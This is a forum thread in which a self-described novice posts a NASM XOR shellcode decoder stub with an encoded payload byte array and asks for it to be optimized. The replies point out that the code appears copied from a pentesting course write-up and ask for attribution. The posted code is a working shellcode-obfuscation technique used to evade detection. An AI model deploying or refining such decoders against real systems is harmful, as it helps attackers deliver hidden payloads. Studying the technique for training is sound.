Member Avatar for Ben_913

I am a novice in assembler programing, I will will appreciate if someone could review these NASM assembler code for me. Is about encoder decoder.
The encoder performs the following:

  1. pads the shellcode with NOP opcodes so it is 4 bytes aligned
  2. a random byte is generated for each 4 bytes of the shellcode
  3. the 4 bytes are put in the reverse order and XORed with the XOR byte
  4. process is repeated until the 0x9090aaaa marker is reached

For those good at NASM assembler for Microsoft Windows, please could you optimize this code? the Code is working but takes lot of time.

global main

section .text

main:
    jmp short call_shellcode

decoder:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
    pop esi             ; address of shellcode
    mov edi, 0xaaaa9090 ; end of shellcode marker
    sub esp, 0x7f       ; make room on the stack (512 bytes)
    sub esp, 0x7f       ; make room on the stack
    sub esp, 0x7f       ; make room on the stack
    sub esp, 0x7f       ; make room on the stack

decode:
    mov bl, byte [esi + edx + 1]    ; read 1st encoded byte
    mov bh, byte [esi + edx + 2]    ; read 2nd encoded byte
    mov cl, byte [esi + edx + 3]    ; read 3rd encoded byte
    mov ch, byte [esi + edx + 4]    ; read 4th encoded byte
    xor bl, byte [esi + edx]        ; xor with the key byte
    xor bh, byte [esi + edx]        ; xor with the key byte
    xor cl, byte [esi + edx]        ; xor with the key byte
    xor ch, byte [esi + edx]        ; xor with the key byte
    mov byte [esp + eax], ch        ; store in memory in reverse order to restore original shellcode
    mov byte [esp + eax + 1], cl    ; ..
    mov byte [esp + eax + 2], bh    ; ..
    mov byte [esp + eax + 3], bl    ; ..

    cmp dword [esi + edx + 5], edi  ; check if we have reached the end of shellcode marked
    jz execute_shellcode            ; if we do, jump to the shellcode and execute it

    inc edx
    inc edx
    inc edx
    inc edx
    inc edx
    add eax, 4
    jnz decode

execute_shellcode:
    jmp short esp

call_shellcode:
    call decoder
    encoder_shellcode: db 0x71,0x71,0xfe,0x99,0x8d,0x9a,0x13,0xfa,0x9a,0x9a,0x08,0x6c,0xda,0x39,0xed,0x0d,0x86,0x3d,0x5f,0x86,0x6c,0x3e,0xe7,0x60,0x3e,0x8d,0x82,0x72,0xbc,0x99,0x36,0xbd,0x10,0x7c,0x81,0xb0,0x70,0x81,0x98,0xc2,0x43,0x3f,0x22,0x7f,0xef,0xa4,0x65,0x84,0x88,0xa6,0x19,0xde,0x18,0x14,0xd6,0x2d,0x7f,0xc2,0x58,0x64,0xe3,0x68,0xf3,0xb1,0x68,0x39,0xe9,0x38,0x05,0x7b,0x79,0x2e,0x01,0x39,0xf2,0x18,0x54,0x6c,0xd8,0x9d,0x64,0xef,0x34,0xb4,0x65,0xb0,0xe8,0x3b,0xa8,0xf8,0x5c,0xd9,0x8f,0x5d,0x7c,0x75,0x3c,0x49,0x01,0xbc,0x56,0x62,0xdd,0xa9,0x67,0xc8,0xf9,0x1e,0xc9,0x43,0xfa,0x35,0x3b,0x56,0x3a,0xee,0xd6,0x29,0xef,0xe3,0xa9,0xaa,0x5d,0xdc,0x49,0xcf,0xb2,0xf4,0x37,0xb2,0xea,0xb2,0x0a,0x9f,0xce,0x1a,0x1b,0x3e,0x42,0x91,0x8c,0x80,0x07,0xea,0x5f,0xcf,0xd3,0x97,0x44,0x84,0xfa,0xfe,0x71,0x29,0xfb,0xe1,0x68,0x31,0xe0,0x6a,0xf2,0xa9,0xd6,0xd6,0xb6,0x3a,0x60,0x63,0x5b,0x61,0xd3,0x8b,0x33,0x2c,0x82,0xfb,0xe9,0x70,0xa1,0xa4,0x05,0xfa,0xfa,0x85,0xec,0x41,0x72,0x29,0x1c,0xbe,0xe5,0x8d,0xe5,0xe5,0xd7,0x90,0xcf,0xa2,0xe3,0xe7,0x07,0x70,0x4b,0x6f,0x53,0x4f,0xa7,0xc6,0x48,0x69,0xd7,0x47,0x6f,0x07,0x28,0xde,0xf7,0xde,0xde,0xdf,0x98,0xf0,0xc8,0xcc,0x5c,0xba,0xba,0xd1,0x3a,0x93,0x7c,0x76,0x16,0xa9,0x83,0x36,0x0e,0x9e,0xf6,0x5e,0x1f,0x1f,0x1d,0x77,0x1e,0x14,0xf2,0x9d,0x48,0x05,0xea,0xba,0xba,0xba,0xba,0x87,0xd7,0xc7,0xd7,0xc7,0x05,0xda,0x0a,0xef,0x6d,0xb3,0x24,0x66,0x4c,0x53,0x30,0x67,0x66,0x20,0x5a,0xa9,0xdd,0x0c,0x30,0xc1,0x3a,0xbf,0xef,0xc5,0x5b,0xa2,0x5d,0xa8,0xd6,0x62,0x67,0x8b,0x12,0x6f,0x29,0x9e,0x9e,0x9e,0xf9,0x76,0x60,0x0a,0x60,0x0a,0x60,0xbb,0xd3,0xec,0xed,0xbf,0xc6,0x99,0x0e,0x1f,0xc4,0xa2,0x5a,0x21,0x77,0x5d,0x98,0x13,0xae,0xe6,0x98,0xc0,0xa8,0x80,0xaa,0xf6,0x27,0x27,0x27,0x37,0x27,0xd9,0xb1,0xd9,0xb3,0x8f,0x03,0xe6,0x50,0xa7,0x5b,0x6c,0x3f,0xff,0xb9,0x93,0x4a,0x19,0x1c,0x4a,0x20,0x20,0xf9,0x22,0x48,0x77,0x4e,0x9b,0xb1,0x11,0x86,0xf6,0x8b,0xf6,0x0e,0x75,0xa1,0xa1,0xc9,0xf9,0x89,0xbc,0xd6,0xbc,0xbc,0xfc,0x37,0x3c,0x5f,0x67,0x37,0x20,0xdf,0x10,0x2f,0x0f,0x36,0x43,0x5e,0x61,0xe3,0xc2,0x3d,0xa3,0x8f,0xac,0x11,0xee,0x4f,0x4f,0xc4,0x9a,0x1f,0x95,0xbe,0x96,0x79,0x86,0x86,0x86,0x09,0x28,0xd7,0xd7,0xb3,0xc1,0xf7,0xde,0x34,0xf6,0x08,0x8a,0x49,0x4b,0xff,0x4c,0x4a,0xe8,0xff,0xba,0xf1,0xcc,0x9f,0xcc,0xa6,0x9a,0xf4,0x64,0x64,0x21,0x0b,0x90,0x90,0xaa,0xaa


ret
  • 3 Contributors
  • 2 Replies
  • 110 Views
  • 6 Hours Discussion Span
  • Latest Post Latest Post by Dani

Recommended Answers

All 2 Replies

Member Avatar for rproffitt

Why does this code look like what I see at https://snowscan.io/custom-encoder/# ?
If you feel the need to discuss Snowscan's code, I see contact information there.

When you post someone else's code, give attribution.

Member Avatar for Dani

I wish I could help but unfortunately I don't know Assembly beyond one course I took in college, two decades ago.

However, to rproffitt's point, it's usually considered good etiquette/technique to give someone credit in the code comments if you're copying/pasting their code.

That being said, the bottom of the article that rproffitt linked to said that the code was created as part of a student's project for a course that was taken at https://www.pentesteracademy.com/course?id=3

Unfortunately it looks like it's a couple hundred dollars but you get access to the videos for the course.

Good luck!

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.